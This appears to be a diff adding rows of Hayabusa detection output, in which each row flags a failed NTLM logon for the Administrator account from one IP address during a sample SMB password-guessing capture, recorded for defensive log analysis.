+2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rYKkl1iHImW9NwKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KxA2dh1iUMaMWOkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sCzEzW8jDZGGZcpd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p8510u5OsCVd94I5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2a0whHngnv7o1Bz2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xy6cGuYgubjlXoMw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luoXLN2XZQC0lHfu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8jdKLW96haKCHHXI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9SQSH6E1aKXu1o7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nOUdKa838wK1mLFw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aFmILxspIJsiEHwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCz7qbdSEyqxQSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny3F1xPgakJK0CA7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi7Moaa6d12CzWhl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fbbRVOig9bn9p5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qSZrfRe9d0LLkbmA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QqdZMYsbXFlrKFxk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kypdxj88trEUBEny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9hM8fge1IrNsJNd2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SzG27JSj6iAFyiNT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hWcjuW8dU5ATLHzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ns9lm9Nvhvi4fY6A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aExdYPqY2eUCYZmC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t9cnmRGdByuJlKZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f9RvWTFFUgCrhlkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HC3oQUIEWqztyx6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TK3BOeD2w9xPB4N1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6yzU5WuvpmPKLSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GFoUGsara5Pl03WP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLaOCImeMIMlGvMj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Vzb3pEI2ZeP2NFA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Fa7ebH7UXd1KW4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wRBHXRkOa6x5KI5G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VNVxzgOLrZzfP3cB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCNXajRX2lIgLQuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x0nukf24IoalycOn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZFZN0KfeHtyDppG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmxqKyWU5GU1y22P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuRyvCfgQ4rwG3fu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3prKZt5ymouwNKnK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CWrNNn13EC1FLwLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfnBT5OvT5cQXHfS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLZFPCShXoPvvThS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UsPCJ0UlfH4urYrm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIQlOetFByLZqPkT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9IBZ0qTDlHWADZt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lmhkB39gKvvuT89e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4KPoZ8JB7WSjUCHW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0mwiPq4gF1YXkQSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y5ncgrpwOFo7E8vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KbkG8ezrAPFC0iKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW4WKkHocNadDzrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: unbtFAiykcfKTbQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oRzF1s9XVoRmoFQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9TO1c7eYd1IQHVwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wsn5GM4BqEl6A6pY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pq350wqwVDQlTKu9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uMJWwjG7J2sOiBYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3YusfxQQygi2x5Cu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q29uj6ovfwz0riC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cj38VsqGLoQ8jGdf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOW8OIO2vQRFaTID | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfYITdZCYwEj9IJV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4BI6V35tZGZ1WGtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOF75n4aunKH9qxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jsTFTCnFFBkhG5jP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qiwcKE2TQui2H8z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PZOCyXplWOCyKbFm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RhyaAhYB78nbh1Ig | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIJU9xbr1klIvvdE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLKVR3mW3g3utO4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNm4tVG8bV7e9gbB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JtU0PCr9K5DXFYV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CH3BWNPEWlw52Gb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
